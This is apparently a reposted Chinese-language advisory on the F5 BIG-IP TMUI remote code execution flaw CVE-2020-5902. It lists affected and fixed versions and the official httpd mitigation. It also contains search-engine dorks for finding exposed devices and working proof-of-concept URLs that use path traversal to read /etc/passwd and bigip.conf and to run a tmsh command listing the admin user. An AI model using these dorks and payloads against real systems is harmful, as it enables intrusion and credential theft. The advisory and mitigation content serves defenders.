漏洞描述
F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。近日,F5官方公布流量管理用户界面(TMUI)配置实用程序的特定页面中存在一处远程代码执行漏洞(CVE-2020-5902)。攻击者利用该漏洞可构造恶意请求,实现远程代码执行。
漏洞复现
搜索语法
shodan http.favicon.hash:-335242539 fofa title="BIG-IP®- Redirect" google intitle:"BIG-IP" inurl:"tmui"
POC
https://target/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd https://target/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts https://target/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license https://target/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf https://target/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
执行成功截图
影响版本
BIG-IP 15.x: 15.1.0/15.0.0 BIG-IP 14.x: 14.1.0 ~ 14.1.2 BIG-IP 13.x: 13.1.0 ~ 13.1.3 BIG-IP 12.x: 12.1.0 ~ 12.1.5 BIG-IP 11.x: 11.6.1 ~ 11.6.5
修复方案
升级到以下版本
BIG-IP 15.x: 15.1.0.4 BIG-IP 14.x: 14.1.2.6 BIG-IP 13.x: 13.1.3.4 BIG-IP 12.x: 12.1.5.2 BIG-IP 11.x: 11.6.5.2
官方建议可以通过以下步骤临时缓解影响
1) 使用以下命令登录对应系统
tmsh
2) 编辑 httpd 组件的配置文件
edit /sys httpd all-properties
3) 文件内容如下
include '
<LocationMatch ".*\.\.;.*">
Redirect 404 /
</LocationMatch>
'4) 按照如下操作保存文件
按下 ESC 并依次输入
:wq
5) 执行命令刷新配置文件
save /sys config
6) 重启 httpd 服务
restart sys service httpd
建议同时禁止外部IP对于TMUI的访问,或只允许管理人员在安全网络环境下访问来缓解漏洞。
原文链接:F5 BIG-IP TMUI (CVE-2020-5902)远程代码执行漏洞,转载请注明来源!